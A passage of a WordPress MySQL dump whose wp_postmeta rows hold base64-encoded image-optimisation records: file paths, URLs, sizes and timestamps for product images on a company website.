YwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItMTA3LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci0xMDctMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAyMDcsImlkIjoxNDQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci0xMDctMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTEwNy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItMTA3LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMjA5LCJpZCI6MTQ0MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItMTA3LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci0xMDctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTEwNy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDIxMiwiaWQiOjE0NDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTEwNy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItMTA3LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci0xMDctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAyMTUsImlkIjoxNDQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci0xMDctNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTEwNy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItMTA3LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMjE3LCJpZCI6MTQ0MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29474, 1436, 'wpfc_optimisation_reduction', '2980401'); 
INSERT INTO `wp_postmeta` VALUES (29475, 1436, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC5qcGciLCJ3aWR0aCI6NjAwMCwiaGVpZ2h0Ijo2MDAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwuanBnIiwicmVkdWN0aW9uIjoyOTgwMzg3LCJ0aW1lIjoxNDgzNTcwMjMxLCJpZCI6IjE0MzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDIzNSwiaWQiOjE0MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtODAweDgwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC04MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMjM5LCJpZCI6MTQzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTc2OHg3NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtNzY4eDc2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAyNDMsImlkIjoxNDM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTE2MDB4MTYwMC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTE2MDB4MTYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0xNjAweDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMjQ3LCJpZCI6MTQzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAyNTAsImlkIjoxNDM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDI1MywiaWQiOjE0MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMjU3LCJpZCI6MTQzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAyNjAsImlkIjoxNDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMjYzLCJpZCI6MTQzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDI2NywiaWQiOjE0MzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAyNzEsImlkIjoxNDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMjc0LCJpZCI6MTQzNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDI3OCwiaWQiOjE0MzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcHJvLW9pbC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wcm8tb2lsLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXByby1vaWwtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAyODEsImlkIjoxNDM2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29476, 1434, 'wpfc_optimisation_reduction', '1752084'); 
INSERT INTO `wp_postmeta` VALUES (29477, 1434, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC5qcGciLCJ3aWR0aCI6NTc2MCwiaGVpZ2h0IjozODQwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwuanBnIiwicmVkdWN0aW9uIjoxNzUyMDcwLCJ0aW1lIjoxNDgzNTcwMjk0LCJpZCI6IjE0MzQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDI5NywiaWQiOjE0MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMzAwLCJpZCI6MTQzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAzMDQsImlkIjoxNDM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMzA4LCJpZCI6MTQzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAzMTEsImlkIjoxNDM0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDMxNCwiaWQiOjE0MzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWR